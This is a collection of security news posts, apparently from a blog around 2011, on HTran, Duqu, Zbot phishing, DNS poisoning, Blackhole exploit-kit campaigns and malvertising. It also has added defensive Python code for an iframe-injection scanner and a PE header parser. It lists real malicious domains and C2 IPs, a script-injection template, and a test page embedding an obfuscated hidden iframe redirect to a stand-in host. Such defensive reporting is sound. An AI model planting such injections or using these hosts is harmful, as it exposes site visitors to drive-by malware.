Cyber attack in Japan : Malware steals 3k confidential documents from farm ministry


In a suspected cyber attack against Japan, foreign hackers may have compromised more than 3,000 confidential documents at the country's Ministry of Agriculture, Forestry and Fisheries by infecting the ministry's systems with malware.

Government investigators identified the malware used in the suspected attack as HTran, a connection-bouncer program believed to have been developed by a Chinese hacker group around 2003, according to a report in The Daily Yomiuri.

HTran is often used in cyber attacks to steal information, since it can relay stolen data covertly.

"The programme was also used to steal data from the Finance Ministry, as HTran data transmissions were discovered to have taken place from October 2010 to November 2011," the report says.

Initially, the ministry did not inform the police, despite the fact that the intrusion fell under the Unauthorized Access Prohibition Law. However, now, the police have launched their own investigation to determine what information has been compromised.

Biggest Cyber attack in India's history, 10k Indian government emails hacked


The Indian government has suffered one of the biggest cyber attacks in the country's history: hackers managed to compromise more than 10,000 email accounts of top government officials. The attack occurred on July 12 this year.

The cybercriminals stole email IDs belonging to officials working at the Prime Minister's Office, the Defence, External Affairs and Finance ministries, and the intelligence agencies.

The attack occurred on July 12 this year, four days after the government was warned by the National Critical Information Infrastructure Protection Centre (NCIIPC).

According to the Indian Express, news of the attack was confirmed by officials of intelligence and enforcement agencies at a day-long NCIIPC meeting in New Delhi this week.

#BatchWiper, a new data-wiping virus targets Iranian computers


The Iranian CERT recently reported a new piece of malware, targeting Iranian computers, that is capable of wiping files from infected machines.

SophosLabs analyzed the new sample and confirmed that the malware attempts to erase the contents of any files on the D, E, F, G, H and I drives.

The malware is distributed as a self-extracting WinRAR archive called GrooveMonitor.exe that drops three executable files: juboot.exe, jucheck.exe and SLEEP.EXE.

'juboot.exe' is a DOS batch file converted to PE format; it uses 'SLEEP.EXE' to wait a few seconds before adding a registry entry that ensures 'jucheck.exe' is executed each time the computer restarts.

The primary function of the malware is wiping files from the hard drive, but it does so only within a few specific date ranges, each about two days long.

After deleting the data, the malware runs chkdsk to trick the victim into believing the files were corrupted by a software or hardware failure.

ACH Bank Transfer Refusal Scam leads to Malware Attack

MX Labs reports that it recently intercepted a large number of emails warning recipients that certain banks had not accepted their payroll payments or transfers; the scam comes with a malware attachment.

The scam emails use subjects such as:
  • ACH debit transfer was hold by Yolo Community Bank
  • ACH payroll payment was not accepted by Central Trust and Savings Bank
  • ACH Transfer was not accepted by Eldorado Bank
  • ACH debit transfer was hold by The Mechanics Bank
  • Funds transfer was hold by our bank
They spoofed the sender address and sent the following message:
Dear Madam / Sir,

I regret to inform you that ACH payroll payment initiated by you or on your behalf was not accepted by Central Trust and Savings Bank.

Transaction ID: 17036653478735
Current status of transaction: on hold

Please review transaction details as soon as possible.

Theodore Parham
Payments Administration
Central Trust and Savings Bank

The "review transaction details" link leads to a malicious page, which asks the visitor via a pop-up to download Adobe Flash Player. The 233 KB file, named "Flash.exe", is, as you might guess, malware.

Kaspersky detects it as Trojan-Spy.Win32.Zbot.coak and McAfee detects it as Artemis!C5D161117328.



Several Windows registry changes are executed, and the trojan can establish a connection to the IP 64.252.17.231 on port 11760.

At the time of writing, only 12 of the 43 AV engines at VirusTotal detected the trojan.

Brazil ISP servers under DNS cache Poisoning attack , spreads Trojan


"Brazil ISP servers under massive DNS cache poisoning attack," warns Kaspersky Lab expert Fabio Assolini. When Brazilians try to visit Facebook, Google, YouTube and other websites, a pop-up message asks them to install "Google Defence" or a Java applet in order to access the sites.

Some unsuspecting users will install it without realising the consequences. If you read EHN or know about security risks, you know what happens next: it installs a banking Trojan.

"Brazil has some big ISPs. Official statistics suggest the country has 73 million computers connected to the Internet, and the major ISPs average 3 or 4 million customers each. If a cybercriminal can change the DNS cache in just one server, the number of potential victims is huge," he points out.

According to Kaspersky, the same IP address hosted a number of malicious files and several exploits, and targeted users seem to be exclusively from Brazil.
In fact the file ad.html is an encrypted script that exploits CVE-2010-4452 to run arbitrary code on an outdated JRE installation. The exploit, detected by Kaspersky as Exploit.Java.CVE-2010-4452.a, then calls up one of the executables hosted at the same address.

Infecting people through DNS poisoning is easy because users trust the sites they visit. In this case the criminals paid an employee with access to the DNS records to modify them so that users were redirected to the malicious site.

Assolini notes that last week the Brazilian police arrested an employee of an ISP in the south of the country; he stands accused of changing his employer's DNS cache and redirecting users to phishing websites, no doubt at the behest of the people running them. "We strongly suspect similar security breaches will be happening in other small and medium ISPs in the country," Assolini commented.

But random Internet users are not the only ones targeted by this type of attack. Employees of various companies have also seen similar pop-up windows when trying to access any website. Once again, they were actually offered a banking Trojan for download.

The attack was made possible by flaws in the networking equipment used by their companies. Routers and modems were accessed remotely by attackers who changed the devices' DNS configurations.

Duqu is an upgraded version of Stars, Spyware that infected Iran


Antivirus firm Kaspersky has enabled protection against the infamous Duqu worm and now detects all versions of it. Its developers updated the product to detect Trojan.Win32.Duqu and all other Trojans that exploit the CVE-2011-3402 vulnerability.

The Duqu Trojan recently became infamous for successfully exploiting a zero-day vulnerability. You can get more information about the malware here.

Following that, organisations started offering protection against the Duqu Trojan; NSS Labs released an Anti-Duqu tool.

Microsoft also issued a temporary fix for this vulnerability.

Duqu is Upgraded Version of "Stars" Malware in Iran:
Research at Kaspersky Lab has unveiled additional information about the Duqu worm. As a result of their investigation, Duqu turns out to have been first spotted as the "Stars" malware (malware created to spy on Iran's nuclear systems).

In April 2011, Iran announced that it was under cyber attack by malware named "Stars". Kaspersky researchers confirmed that some of the Duqu targets were hit on April 21 using the same method involving CVE-2011-3402, a kernel-level exploit in win32k.sys via an embedded TrueType Font (TTF) file.

According to analysis by IrCERT (Iran's Computer Emergency Response Team) Duqu is an upgraded version of "Stars".

Anti-Duqu available for free, 100% Accurate detection of Duqu


Duqu (similar to Stuxnet) is a notorious worm that exploits a Windows zero-day vulnerability. Microsoft released a temporary fix for this vulnerability yesterday. NSS Labs claims to have developed a very accurate Duqu detection tool, available for free.

The tool detects all Duqu drivers installed on a system. It was developed in the hope that additional drivers can be discovered, allowing researchers to learn more about the functionality, capabilities and ultimate purpose of Duqu.

According to NSS's tests, the tool's success rate is 100% with zero false positives. The developers say it uses advanced pattern-recognition techniques and is also capable of detecting new drivers as they are discovered.

Two new drivers were discovered after the tool was completed, and both were detected by the NSS tool with no updates required.
 

Zero-day Vulnerability in Windows Kernel exploited by Duqu worm


A zero-day vulnerability in the Windows kernel was found by researchers at the Cryptography and System Security (CrySyS) Lab while analysing the Duqu malware. CrySyS immediately reported the vulnerability to Microsoft.

CrySyS discovered the Duqu binaries and confirmed that they are nearly identical to Stuxnet. Until then, no one had been able to find the installer for the threat, and so no one knew how Duqu was initially infecting systems.

CrySyS found that the installer is a Microsoft Word document (.doc) that uses a previously unknown kernel vulnerability. When the .doc file is opened, Duqu infects the system.

W32.Duqu is a worm that opens a back door and downloads more files on to the compromised computer. It also has rootkit functionality and may steal information from the compromised computer.

Duqu Infection:

"The Word document was crafted in such a way as to definitively target the intended receiving organization. Furthermore, the shell-code ensured that Duqu would only be installed during an eight-day window in August. Please note that this installer is the only installer to have been recovered at the time of writing—the attackers may have used other methods of infection in different organizations," reads the Symantec report.

Once a system is infected by Duqu, the attacker can control it and infect other organisations through social engineering. In one organisation, evidence was found showing the attackers commanding Duqu to spread across SMB shares.

Even when the infected system could not connect to the Internet, the malware was configured to communicate with the C&C server through another infected system that did have a connection.

Consequently, Duqu creates a bridge between the network's internal servers and the C&C server. This allowed the attackers to access Duqu infections in secure zones with the help of computers outside the secure zone being used as proxies.

Several countries have fallen victim to Duqu; according to the Symantec report, systems in 8 countries have been infected.

The analysis also showed that the malware contacts a server hosted in India.

"Microsoft is collaborating with our partners to provide protections for a vulnerability used in targeted attempts to infect computers with the Duqu malware. We are working diligently to address this issue and will release a security update for customers through our security bulletin process," Jerry Bryant, group manager of response communications in Microsoft's Trustworthy Computing group, said in a statement.

See the updated whitepaper (version 1.3) from Symantec.

TimThumb vulnerability in Wordpress leads to malware infection

Last month, thousands of WordPress sites were found infected with malware, as discovered by Armorize. Avast researchers investigated this hack and concluded that the Blackhole exploit kit, made by Russian developers and available for $1,500 on the black market, was responsible.

The vulnerability in non-updated TimThumb allows attackers to upload and execute arbitrary PHP code in the TimThumb cache directory, which then downloads other malicious files. But this is not the only way in: the attackers also use stolen passwords to make changes directly over FTP.

In your FTP listing, alongside the other site files, a new file will appear that looks like ./wp-content/w3tc/min/a12ed303.925433.js or ./wp-includes/js/l10n.js

These scripts redirect to a site where the Blackhole exploit kit is located. The victim is then served a JAR file that deploys other malicious downloads to the infected system.

source:
Avast

Cyber Criminals jailed 4 years for Stealing £3 million from bank accounts

The ring leaders of a cyber criminal gang that siphoned nearly £3 million from bank accounts were yesterday (Monday 31 October) jailed following an investigation by the Met's Police Central e-Crime Unit (PCeU).

Ukrainian nationals Yuriy Konovalenko, aka Pavel Klikov (29), and Yevhen Kulibaba (33) were jailed for four years and eight months at Croydon Crown Court after previously pleading guilty to conspiracy to defraud.

This result is the culmination of a complex and protracted investigation by detectives from the Met's Police Central e-Crime Unit which has seen 13 people jailed for their part in a sophisticated international online fraud that attacked the heart of the UK banking industry.

The investigation, codenamed Operation Lath, focussed on the activities of a group responsible for conducting a systematic and highly sophisticated banking fraud which attacked the banking accounts of hundreds of online customers.

The fraud was perpetrated through the use of banking 'Trojans' to infect the personal computers of bank account holders and subsequently secure funds from them. The malicious software programme was able to capture confidential information, such as usernames, passwords and account numbers. These details were then used to access those accounts without the knowledge of the owners. Funds were then transferred to a large number of receiving accounts controlled by the group.

Kulibaba was the principal within this group of conspirators. He was based in the Ukraine and was responsible for obtaining and allocating accounts to be attacked, and organising the UK based conspirators to set up and operate recipient accounts and remove funds from them.

Konovolenko was Kulibaba's right hand man in the UK. He had a co-ordinating role, organising the establishment and operation of recipient accounts and instructing those with responsibility for organising the removal of the money out of the recipient accounts.

During the investigation the PCeU worked closely with UK banks and colleagues from the Crown Prosecution Service, the FBI and the US Department of Justice.

Report from met.police.uk 

Avira Antivirus detects itself as Malware | False Virus Definition File

Avira Antivirus has labeled itself as spyware: it detects AESCRIPT.DLL (one of Avira's own DLL files) as "TR/Spy.463227".
The recent Virus Definition File update (VDF version 7.11.16.146) mistakenly includes the AESCRIPT.DLL library as spyware, so Avira detects itself.

After becoming aware of the issue, Avira updated the Virus Definition File and asked users to update their antivirus. They posted about the issue in their official forum.


Japanese parliament's computers infected by virus in a cyber attack


The Japanese parliament's computers were infected by a virus that gave hackers access. For over a month they stole confidential data belonging to 480 lawmakers and their staff.

According to the report, the servers were infected after a Trojan horse was emailed to a Lower House member in July. The Trojan downloaded malware from a China-based server; this malware spied on email communications, stole lawmakers' confidential data and sent it to the attacker.

Last month, servers at Mitsubishi (Japan's biggest defence contractor) were compromised and confidential data was stolen, including data on fighter jets as well as nuclear power plant design and safety plans.

Tsunami backdoor Trojan Horse for Mac OS X, port of Troj/Kaiten


Sophos researchers discovered a new Trojan horse named "Tsunami" that infects Mac OS X. The researchers say it appears to be a port of Troj/Kaiten, a Linux backdoor Trojan which, once embedded on a system, listens on an IRC channel for further instructions.

An attacker can gain access to an infected system and use it to launch DDoS (Distributed Denial of Service) attacks.

Sophos Anti-Virus now includes OSX/Tsunami-A in its virus definitions, so it can detect this malware. Don't forget to update your antivirus.


Mass Iframe injections used to drive traffic | Traffic Direction System[TDS]


Security researchers at Sophos noticed a rise in the volume of Mal/Iframe-Gen detections. A number of sites have been infected using the iframe injection technique; these infected sites are used to drive traffic to other websites (mostly malware sites).


Despite the obfuscation, Sophos products proactively block these malicious scripts as Mal/Iframe-Gen. As suggested from the threat name, the payload of the injected script is to write an iframe to the page:

The iframe points to what appears to be a 'middleman' server, used to bounce the traffic elsewhere. This is commonly known as a Traffic Direction System (TDS). The TDS server is under the control of the attackers, enabling them to configure it to redirect user traffic to wherever required.

At first the injected iframe redirected to a freshly registered domain (hosted in Germany). However, the page was unavailable, with all requests getting a 404 error. This was a little surprising given that the attack was new (you expect 404s for old, stale attacks where the compromised sites persist long after the target payload servers have been shut down).

Later the TDS server was updated to redirect the traffic to a new destination. At the time of writing it is redirecting the traffic to a Blackhole exploit pack site, where the victim is bombarded with the usual Flash, Java and PDF exploits.

The illustration below gives an overview of this attack, and the role that the TDS server plays in it.

This attack provides us with a perfect illustration of how user traffic is a commodity. Once they have injected numerous sites to redirect to their TDS, the attacker can essentially sell that user traffic to interested parties, willing to pay for victims to hit their exploit sites.

As ever, protection from this form of attack consists of several components:
  • detection of the malicious redirects injected into the legitimate sites (in this case, proactive detection as Mal/Iframe-Gen).
  • URL filtering to block requests to the TDS. Thus far, a few different servers are being used in these attacks.
  • URL filtering to block requests to the final destination servers.
  • detection of the exploit site itself (Mal/ExpJS-N) and the various malicious files it uses.
  • detection of the final payload (which will vary as the final destination server changes).
  • if all else has failed, runtime protection (HIPS) to catch the malicious payload running on the victim's machine.

Bloody photos of Gaddafi's death, A spam Mail leads to malware infection


Malware authors are taking advantage of the death of Libyan dictator Colonel Gaddafi to spread malware. They have spammed out an attack posing as pictures of Gaddafi's death, tricking users into believing that the pictures come from the AFP news agency and are being forwarded by a fellow Internet user.

Spam Mail:

Subject: Fw: AFP Photo News: Bloody Photos: Libya dictator Moammar Gadhafi's Death

Message body:

Libya dictator Moammar Gadhafi's Death

Libyan dictator Moammar Gadhafi, the most wanted man in the world, has been killed, the country's rebel government claimed Oct. 20. The flamboyant tyrant who terrorized his country and much of the world during his 42 years of despotic rule was cornered by insurgents in the town of Sirte, where Gadhafi had been born and a stronghold of his supporters.

Attached file: Bloody Photos_Gadhafi_Death.rar
If Windows users open the attachment, their system will be infected.

Sophos anti-virus products detect the malware proactively as Mal/Behav-103.

Symantec AdVantage(Anti-Malvertising): Armorize and Symantec partnered and launched


Armorize Technologies and Symantec have joined forces to fight malvertising. They launched Symantec AdVantage (Anti-Malvertising), a cloud-based scanner that detects malvertising (malicious advertisements) online.

“Malvertising poses a serious risk to online publishers and their customers, reputation and revenue. Highly publicized malvertising infections can damage the reputation of even the most trusted online sites. Symantec AdVantage will provide ad publishers the tools they need to protect their businesses by fighting back against these threats.”
– Fran Rosch, Vice President, Identity and Authentication Services, Symantec Corp.

Symantec AdVantage will scan, detect and report malvertising on websites by automatically alerting publishers and identifying the location of malicious advertisements, so customers can remove malicious ads that may damage their business's reputation. A real-time performance dashboard complements these automatic reports with additional insight: for example, Symantec AdVantage will let customers compare safe ads to malicious advertisements and discover how and when malvertising occurred by visually tracing the path and source of infected advertisements.

Symantec AdVantage is scheduled to be made available to publishers and ad networks through a free early access program beginning in November 2011.

The service will be available here:
http://advantage.symantec.com/

Reference:
A few days back, the famous torrent site KickAssTorrents (KAT.ph) served malvertising, as detected by Armorize.

KickAssTorrents(Kat.ph) infected and serving malware through Malvertising

The OpenX ad platform of the famous torrent website KickAssTorrents (kat.ph, Alexa rank 321) was compromised and served the fake antivirus "Security Sphere 2012" through malvertising (malicious advertisements), as detected by Armorize. When a user clicks the ad, it redirects to a fake page that infects the user without their knowledge.


Coincidentally, KickAss Torrents published a blog post on Oct 10th in response to the website being flagged by antivirus vendor Avast. In it they said:
===================
Our users that are using the Avast anti-virus might have noticed that KAT.ph suddenly became labeled as a dangerous website for users that are not logged in. We want to assure our users that KickassTorrents has no malware or viruses of any kind and it is absolutely safe to use our website. We already contacted Avast and currently we are trying to find and fix the cause of this problem. You will help us if you choose the "Report the file as a false positive" option if you get the alert.
===================

In another thread, KickAss Torrents said:

===================
Now what the hell does this error mean?
First of all, don't flip out, don't go post on the KAT site, post down here if you experience the same problem.
Secondly, report down here if you experience this error.
Thirdly, add kat.ph to the safe URLs in your AV.
And lastly, please go to this site and report the problem (Avast! users only):
Avast! forum thread
Back on topic. What is this error? Does error roughly means that your anti-virus software has found some bad code in an iFrame. This could be from the site itself, or from advertisements. An iFrame is a piece of code that allows you to do several things. Embedding something to your site is a good example.
I hope this topic helps a little and I certainly hope the error is going to be fixed now.
Q&A:
Q: OMFG IS KAT HACKED?
A: Nope, just some error.
Q: Is it really safe to visit KAT?
A: Yes, it is.
===================
KickAss Torrents also referred to this discussion thread on Avast's forum. At the end of the forum it appears that Avast has acknowledged that it was indeed a false positive and have addressed the issue:

===================
Hello,

It should be solved, if not let us know please.

Miroslav Jenšík
AVAST Software a.s.
===================

Well, that time it might have been a false positive from Avast, but this time the website is absolutely infecting its visitors, as seen in our video.


The attacker injected the malicious script using the following url:
http://ad.kat.ph/delivery/ajs.php?zoneid=4&target=_blank&charset=UTF-8&cb=95920847237&charset=UTF-8&loc=http%3A//www.kat.ph/&section=1939940

At the time of detection, only 2 of the 42 engines on VirusTotal detected the malware.

According to Armorize, this attacker is also responsible for the speedtest.net incident.

The attacker uses DynDNS domains for the exploit server. Domain names are auto-calculated using JavaScript: the algorithm generates a (predictable) different dyndns.tv domain every hour, in the format roboABCD.tv, where ABCD are characters derived from a fixed seed and incremented by one character every UTC hour.

The DynDNS domain for the next hour is generated every hour precisely at minutes 2 to 5, so this is probably done by an automated mechanism.

All generated domains resolve to a single IP: 184.22.224.154 (AS21788, United States Scranton Network Operations Center Inc), located in the US.

The domain obama-president.com resolves to this IP and is serving the same exploit pack. This domain was registered on Aug 4th through a Russian registrar, 1'ST DOMAIN NAME SERVICE (www.1dns.ru). At that time the domain resolved to a Netherlands IP, 85.17.93.9; it started to resolve to 184.22.224.154 on Aug 23rd. This IP and the president-obama.com domain are both currently still up and working.

This video shows how users are infected:



Another Mass IFrame Injection Attack |350,000 ASP sites infected

Another mass iframe injection attack has been detected by armorize.com researchers. In July they detected a mass iframe injection that infected 90,000 websites; this time the number has increased to 350,000 infected websites, and the attackers targeted sites developed with ASP.NET.


According to Google results, 180,000 websites are infected by this iframe injection attack. The attackers targeted victims whose websites use six particular languages: English, German, French, Italian, Polish and Breton.
If you want to check the list of infected sites, search Google for "http://jjghui.com/urchin.js". Never click on the websites returned by that search: they will launch the malware attack.

Malware Infection:
The malicious script inserted into the victim website causes the visiting browser to load an iframe, first from www3.strongdefenseiz.in and then from www2.safetosecurity.rr.nu.
Multiple browser-based drive-by download exploits are served depending on the visiting browser.

When the user is redirected to the malware server, it serves the malware to the visitor, and the malware is installed automatically without the user's knowledge if the browsing platform is outdated (browser, Adobe PDF, Adobe Flash, Java, etc.).

Currently, 6 of the 43 antivirus vendors on VirusTotal detect the dropped malware.

jjghui.com resolves to IP 146.185.248.3 (AS3999), which is in Russia. www3.strongdefenseiz.in resolves to 75.102.21.121 (AS36352), which is in the US and hosted by HostForWeb.com. www2.safetosecurity.rr.nu resolves to IP 67.208.74.71 (AS33597), which is in the US and hosted by InfoRelayOnlineSystems.

The dropped malware attempts to connect to: 65.98.83.115 (AS25653), which is in the US.


IFrame Injection:
They inserted the iframe into the webpage through a web application vulnerability, like this:
<script src="Link_to_malicious_script"></script>

This inserts the malicious JavaScript into the website. The script generates an iframe to www3.strongdefenseiz.in, which returns an HTTP 302 redirect to the exploit server at www2.safetosecurity.rr.nu.

Security tips from BreakTheSecurity.com for webmasters:
If your site is also infected, delete all files from your server (hopefully you have a backup of your website's contents), install the latest antivirus on your system, and verify your code before uploading it.
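Both this attack and the Sophos TDS campaign above start with a foreign `<script src>` tag or a hidden iframe injected into otherwise legitimate pages, often wrapped in document.write/unescape obfuscation. The following scanner is an added example, not code from Armorize, Sophos or BreakTheSecurity, that flags those three patterns in a site's HTML; the TRUSTED_HOSTS allowlist, the example-site.test and tds.example.test hosts and both sample pages are constructed for the demonstration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this site legitimately loads scripts and frames from (constructed allowlist).
TRUSTED_HOSTS = {"www.example-site.test", "cdn.example-site.test"}

# Constructs common in obfuscated iframe droppers: runtime decoding and an
# escaped "<iframe" written into the page at load time.
SUSPICIOUS_INLINE = re.compile(
    r"document\.write\s*\(|unescape\s*\(|String\.fromCharCode|%3Ciframe", re.I)


def _is_hidden(attrs):
    """True for the 0x0 / 1x1 / display:none frames used to hide a redirect."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    tiny = {"0", "1", "0px", "1px"}
    return (attrs.get("width") in tiny or attrs.get("height") in tiny
            or "display:none" in style or "visibility:hidden" in style)


class InjectionScanner(HTMLParser):
    """Collects (finding_type, evidence) pairs while parsing one HTML page."""

    def __init__(self, trusted):
        super().__init__()
        self.trusted = trusted
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self._in_script = True
            host = urlparse(a.get("src", "")).hostname
            if host and host not in self.trusted:
                self.findings.append(("external-script", a["src"]))
        elif tag == "iframe":
            src = a.get("src", "")
            host = urlparse(src).hostname
            if host and host not in self.trusted:
                kind = "hidden-iframe" if _is_hidden(a) else "external-iframe"
                self.findings.append((kind, src))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Script bodies arrive here as one chunk; flag the decoder patterns.
        if self._in_script and SUSPICIOUS_INLINE.search(data):
            self.findings.append(("obfuscated-inline-script", data.strip()[:60]))


def scan_html(html, trusted=TRUSTED_HOSTS):
    """Scan one page and return its findings (an empty list means nothing flagged)."""
    scanner = InjectionScanner(trusted)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed samples: a clean page, and the same page with the three injection styles.
CLEAN_PAGE = """<html><head>
<script src="http://cdn.example-site.test/app.js"></script>
</head><body><p>Welcome</p></body></html>"""

INFECTED_PAGE = """<html><head>
<script src="http://cdn.example-site.test/app.js"></script>
<script src="http://jjghui.com/urchin.js"></script>
</head><body><p>Welcome</p>
<iframe src="http://www3.strongdefenseiz.in/" width="1" height="1" style="display: none"></iframe>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A//tds.example.test/go.php%22%3E%3C/iframe%3E'));</script>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("infected", INFECTED_PAGE)):
        print(name, scan_html(page))
```

Run it over every .html/.aspx template pulled from the server, not over live pages, so a compromised page cannot serve the scanner something different.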

Malware Analyzer v3.3 Released ~Security Tools

 
Malware Analyser is a freeware tool for performing static and dynamic analysis of malware.

Features:
  • String-based analysis for registry keys, API calls, IRC commands, DLLs called and VM-awareness.
  • Displays detailed PE headers with all section details, import and export symbols, etc.
  • On Linux distributions, can perform an ASCII dump of the PE along with other options (check the --help argument).
  • On Windows, it can generate the various parts of a PE: DOS Header, DOS Stub, PE File Header, Image Optional Header, Section Table, Data Directories, Sections, and an ASCII dump.
  • Code analysis (disassembling).
  • Online malware checking (www.virustotal.com).
  • Checks for packers against its database.
  • Tracer functionality: can be used to identify anti-debugging tricks, file system manipulation calls, rootkit hooks, keyboard hooks, DEP setting changes and network identification traces.
  • Signature creation: allows creating a signature for a malware sample.
  • Batch mode scan to scan all DLLs and EXEs in directories and sub-directories.
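The header dump the tool advertises (DOS header, PE file header, optional header, section table) is easy to reproduce. The following is an added example, not Malware Analyser's own code, that parses those structures with Python's struct module from a constructed minimal PE32 image and reports the header-level hints a packer check looks at: writable-and-executable sections, a section extending past the end of the file, and an entry point outside .text. The sample image, its timestamp and its section layout are constructed for the demonstration.

```python
import struct

# Section characteristics flags from the PE specification.
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def parse_pe(data):
    """Parse the DOS header, PE/COFF header, optional header and section table."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ signature")
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)        # DOS header -> PE header offset
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, timestamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic, = struct.unpack_from("<H", data, opt)
    entry, = struct.unpack_from("<I", data, opt + 16)       # AddressOfEntryPoint (RVA)
    if magic == 0x10B:                                      # PE32
        image_base, = struct.unpack_from("<I", data, opt + 28)
    elif magic == 0x20B:                                    # PE32+
        image_base, = struct.unpack_from("<Q", data, opt + 24)
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    size_of_image, = struct.unpack_from("<I", data, opt + 56)
    subsystem, = struct.unpack_from("<H", data, opt + 68)
    sections = []
    for i in range(nsections):                              # 40-byte IMAGE_SECTION_HEADERs
        f = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": f[0].rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_size": f[1], "virtual_address": f[2],
                         "raw_size": f[3], "raw_pointer": f[4], "characteristics": f[9]})
    return {"machine": machine, "timestamp": timestamp, "characteristics": chars,
            "magic": magic, "entry_point": entry, "image_base": image_base,
            "size_of_image": size_of_image, "subsystem": subsystem,
            "sections": sections, "file_size": len(data)}


def section_for_rva(pe, rva):
    """Name of the section containing an RVA, or None if it falls outside all of them."""
    for s in pe["sections"]:
        span = max(s["virtual_size"], s["raw_size"])
        if s["virtual_address"] <= rva < s["virtual_address"] + span:
            return s["name"]
    return None


def indicators(pe):
    """Header-level hints an analyst looks at before running the sample."""
    hints = []
    for s in pe["sections"]:
        c = s["characteristics"]
        if c & IMAGE_SCN_MEM_EXECUTE and c & IMAGE_SCN_MEM_WRITE:
            hints.append("writable+executable section %s" % s["name"])
        if s["raw_pointer"] + s["raw_size"] > pe["file_size"]:
            hints.append("section %s extends past end of file" % s["name"])
    ep = section_for_rva(pe, pe["entry_point"])
    if ep is None:
        hints.append("entry point 0x%x lies outside every section" % pe["entry_point"])
    elif ep != ".text":
        hints.append("entry point in section %s (not .text)" % ep)
    return hints


def build_sample_pe(entry=0x1000, data_chars=0xC0000040):
    """Construct a minimal, non-runnable PE32 image: headers plus two zero-filled sections."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\0" * 58 + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    opt = (struct.pack("<HBBIIIIII", 0x10B, 14, 0, 0x200, 0x200, 0, entry, 0x1000, 0x2000)
           + struct.pack("<III", 0x400000, 0x1000, 0x200)             # ImageBase, alignments
           + struct.pack("<HHHHHH", 6, 0, 0, 0, 6, 0)                 # OS/image/subsystem versions
           + struct.pack("<IIIIHH", 0, 0x3000, 0x200, 0, 2, 0x8140))  # ..., Subsystem, DllCharacteristics
    opt = opt.ljust(0xE0, b"\0")                                      # standard PE32 optional header size
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0x4E9C3D2A, 0, 0, len(opt), 0x0102)  # constructed timestamp
    text = struct.pack("<8sIIIIIIHHI", b".text", 0x100, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    data = struct.pack("<8sIIIIIIHHI", b".data", 0x100, 0x2000, 0x200, 0x400, 0, 0, 0, 0, data_chars)
    headers = (dos + b"PE\0\0" + coff + opt + text + data).ljust(0x200, b"\0")
    return headers + b"\0" * 0x400                                    # two 0x200-byte sections


if __name__ == "__main__":
    pe = parse_pe(build_sample_pe())
    print("machine=0x%x sections=%s" % (pe["machine"], [s["name"] for s in pe["sections"]]))
    print(indicators(parse_pe(build_sample_pe(entry=0x2000, data_chars=0xE0000040))))
```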

Malware Analyzer v3.3 has been released.

Changelogs:

--Added Traces signatures
--Improved parsing
--Bug fixes

Online Virus Removal Sites infected by malwares , infects visitors machine


The online virus removal website laptopvirusrepair.co.uk has been infected with malware and serves malware to visitors' systems. The site offers to pick up your infected laptop, clean it and ship it back to you for a fee.

The infection is an obfuscated iframe that redirects to a site delivering exploits: zdesestvareznezahodi.com/tds/go.php?sid=1
The site is listed on the malwareblacklist website.



Before worrying about other people's laptop security, they should consider their own server security. Now most of their visitors are affected by malware, and regaining their trust will not be easy.